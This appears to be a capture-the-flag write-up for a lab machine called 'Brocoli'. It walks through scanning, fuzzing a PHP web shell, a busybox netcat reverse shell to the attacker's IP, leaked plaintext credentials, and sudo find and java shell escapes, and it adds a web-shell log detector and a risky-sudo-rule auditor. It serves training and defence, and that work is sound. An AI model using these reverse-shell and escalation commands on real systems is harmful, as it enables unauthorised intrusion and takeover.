Brocoli


Target machine: https://labs.thehackerslabs.com/machine/163

Information gathering

Host discovery

root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                                      [18:30:46]
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.100.31
Starting arp-scan 1.10.0 with 512 hosts (https://github.com/royhills/arp-scan)
......
192.168.100.22 08:00:27:06:e0:1d PCS Systemtechnik GmbH
......

44 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 512 hosts scanned in 2.879 seconds (177.84 hosts/sec). 40 responded

Port scanning

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.22                                                       [18:31:23]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.22:22
Open 192.168.100.22:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 18:32 CST
Initiating ARP Ping Scan at 18:32
Scanning 192.168.100.22 [1 port]
Completed ARP Ping Scan at 18:32, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:32
Completed Parallel DNS resolution of 1 host. at 18:32, 6.51s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 18:32
Scanning 192.168.100.22 [2 ports]
Discovered open port 22/tcp on 192.168.100.22
Discovered open port 80/tcp on 192.168.100.22
Completed SYN Stealth Scan at 18:32, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.22
Host is up, received arp-response (0.00050s latency).
Scanned at 2026-01-22 18:32:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:06:E0:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.66 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory scan on 80/tcp

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.22                                               [18:32:38]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.22/_26-01-22_18-32-52.txt

Target: http://192.168.100.22/

[18:32:52] Starting:
[18:32:53] 403 - 279B - /.ht_wsr.txt
[18:32:53] 403 - 279B - /.htaccess.bak1
[18:32:53] 403 - 279B - /.htaccess.sample
[18:32:53] 403 - 279B - /.htaccess.save
[18:32:53] 403 - 279B - /.htaccess_extra
[18:32:53] 403 - 279B - /.htaccess_sc
[18:32:53] 403 - 279B - /.htaccessBAK
[18:32:53] 403 - 279B - /.htaccess_orig
[18:32:53] 403 - 279B - /.htaccessOLD
[18:32:53] 403 - 279B - /.htaccessOLD2
[18:32:53] 403 - 279B - /.htm
[18:32:53] 403 - 279B - /.html
[18:32:53] 403 - 279B - /.htpasswd_test
[18:32:53] 403 - 279B - /.htpasswds
[18:32:53] 403 - 279B - /.httr-oauth
[18:32:53] 403 - 279B - /.php
[18:32:54] 403 - 279B - /.htaccess.orig
[18:33:03] 403 - 279B - /server-status
[18:33:03] 403 - 279B - /server-status/
[18:33:05] 301 - 318B - /uploads -> http://192.168.100.22/uploads/
[18:33:05] 200 - 493B - /uploads/

/uploads/brocoli.php returns a 500.

A 500 rather than a 404 means the script exists but fails without the input it expects, so there must be something behind it. Fuzz for the parameter name:

wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -u http://192.168.100.22/uploads/brocoli.php\?FUZZ\=id --hc 404,500


The script takes its input through the cmd parameter.

www shell

Since we can execute commands, spawn a reverse shell directly.

busybox nc 192.168.100.31 7777 -e /bin/bash

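From the defender's side, the web shell on this box leaves a very recognisable trail: requests for a PHP file under /uploads/ (first a bare probe that returned 500, then requests carrying a query string). The script below, an added example that is not part of the original write-up, scans Apache combined-format access log lines for exactly that pattern. The log lines are constructed to match the requests made above (IP, path and the cmd parameter come from the write-up; timestamps, sizes and user agents are made up).

```shell
#!/bin/sh
# Added example (not from the original write-up): flag requests for PHP files
# served out of an upload directory, a pattern that should never occur on a
# server where /uploads/ is data-only.

# Constructed sample log lines in Apache combined format. The 500 on the bare
# request and the later ?cmd= request mirror the write-up; everything else
# (timestamps, byte counts, user agents) is invented for the example.
sample_access_log() {
    cat <<'EOF'
192.168.100.31 - - [22/Jan/2026:18:33:05 +0100] "GET /uploads/ HTTP/1.1" 200 493 "-" "Mozilla/5.0"
192.168.100.31 - - [22/Jan/2026:18:33:40 +0100] "GET /uploads/brocoli.php HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.168.100.31 - - [22/Jan/2026:18:35:12 +0100] "GET /uploads/brocoli.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.168.100.31 - - [22/Jan/2026:18:36:02 +0100] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
EOF
}

# webshell_hits [LOGFILE...]
# Reads combined-format access log lines (from the files given, or stdin) and
# prints one tab-separated line per request for a PHP file under /uploads/:
#   <client ip>  <path>  <status>  <query string or ->
# Which extensions actually execute depends on the server's PHP handler
# configuration; the list here is an assumption covering the usual ones.
webshell_hits() {
    awk '
        {
            # Field 7 is the request target: /path?query
            req = $7
            path = req
            sub(/\?.*$/, "", path)
            query = (index(req, "?") > 0) ? substr(req, index(req, "?") + 1) : "-"
            if (path ~ /^\/uploads\/.*\.(php[0-9]?|phtml|phar)$/)
                print $1 "\t" path "\t" $9 "\t" query
        }' "$@"
}

# Stand-alone usage: run the detector over the constructed sample.
sample_access_log | webshell_hits
```

Run it against a real log with `webshell_hits /var/log/apache2/access.log`. The durable fix is not the detection but the configuration: an upload directory should not execute scripts at all (in Apache, a `<Directory>` block for /uploads/ that removes the PHP handler or sets `php_admin_flag engine off`), so that a dropped .php file is served as inert bytes.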

Privilege escalation

www -> brocoli

The brocoli user's credentials are leaked in the /opt directory.

www-data@TheHackersLabs-Brocoli:/opt$ cat credenciales.txt

--------------------------------------------------------------------------
Credenciales:
--------------------------------------------------------------------------
[+] Usuario: brocoli
[+] Contraseña: megustalafruta
--------------------------------------------------------------------------

brocoli:megustalafruta

brocoli -> brocolon

brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
(brocolon) NOPASSWD: /usr/bin/find

brocoli can run find as brocolon via sudo, and GTFOBins has a ready-made entry for it. Because find then runs as brocolon, who cannot read /home/brocoli, it has to be started from a directory brocolon can enter, such as /tmp.

https://gtfobins.org/gtfobins/find/

brocoli@TheHackersLabs-Brocoli:~$ sudo -u brocolon /usr/bin/find . -exec /bin/bash \; -quit
/usr/bin/find: ‘.’: Permission denied
/usr/bin/find: Failed to restore initial working directory: /home/brocoli: Permission denied
brocoli@TheHackersLabs-Brocoli:~$ cd /tmp/
brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -u brocolon /usr/bin/find . -exec /bin/bash \; -quit
brocolon@TheHackersLabs-Brocoli:/tmp$ whoami
brocolon
brocolon@TheHackersLabs-Brocoli:/tmp$

brocolon -> root

brocolon@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocolon on TheHackersLabs-Brocoli:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User brocolon may run the following commands on TheHackersLabs-Brocoli:
(ALL : ALL) NOPASSWD: /usr/bin/java

Privilege escalation through sudo java likewise has a ready-made GTFOBins entry.

https://gtfobins.org/gtfobins/java/
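Both hops on this box (find as brocolon, then java as root) come from the same misconfiguration: a sudo rule granting a binary that can spawn a shell. The script below is an added example, not part of the original write-up, that audits `sudo -l` output for such rules so an administrator can catch them before an attacker does. The sample input is constructed from the two `sudo -l` listings above plus one harmless control rule; the list of risky binaries is an illustrative subset of what GTFOBins documents, not the full list.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag sudo rules that grant
# binaries with a documented shell escape.

# Illustrative subset of binaries GTFOBins lists as able to spawn a shell
# under sudo (assumption: extend with the full GTFOBins list in practice).
RISKY_BINS="find java vim less more awk perl python python3 env bash sh"

# Constructed sample: the two rules from this box plus a harmless control.
sample_sudo_output() {
    cat <<'EOF'
Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
    (brocolon) NOPASSWD: /usr/bin/find
    (ALL : ALL) NOPASSWD: /usr/bin/java
    (root) /usr/bin/id
EOF
}

# risky_sudo_rules [FILE...]
# Reads sudo -l output (files or stdin) and prints one tab-separated line per
# rule whose command is in RISKY_BINS:  <runas>  <command>  <NOPASSWD|PASSWD>
risky_sudo_rules() {
    awk -v bins="$RISKY_BINS" '
        BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
        # Rule lines look like "(runas) NOPASSWD: /usr/bin/find"
        # or "(ALL : ALL) /usr/bin/java"; everything else is ignored.
        /^[ \t]*\(/ {
            runas = $0
            sub(/^[ \t]*\(/, "", runas); sub(/\).*$/, "", runas); gsub(/ /, "", runas)
            rest = $0
            sub(/^[^)]*\)[ \t]*/, "", rest)
            tag = (rest ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
            sub(/^.*:[ \t]*/, "", rest)            # drop NOPASSWD:/SETENV: tags
            m = split(rest, cmds, /, */)           # a rule may list several commands
            for (j = 1; j <= m; j++) {
                cmd = cmds[j]; sub(/[ \t].*$/, "", cmd)   # drop any fixed arguments
                base = cmd; sub(/^.*\//, "", base)
                if (base in risky) print runas "\t" cmd "\t" tag
            }
        }' "$@"
}

# Stand-alone usage: audit the constructed sample.
sample_sudo_output | risky_sudo_rules
```

On a live system run `sudo -l -U <user> | risky_sudo_rules` for each account, or feed it `sudo -l` output collected by a configuration audit. Any hit is a rule that should be replaced with a wrapper script that takes no attacker-controlled arguments, or removed.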

First, generate the malicious Java file on Kali.

cat >Shell.java <<EOF
public class Shell {
    public static void main(String[] args) throws Exception {
        new ProcessBuilder("/bin/sh").inheritIO().start().waitFor();
    }
}
EOF

javac Shell.java

Transfer it to the target machine.

busybox wget http://192.168.100.31:8000/Shell.java
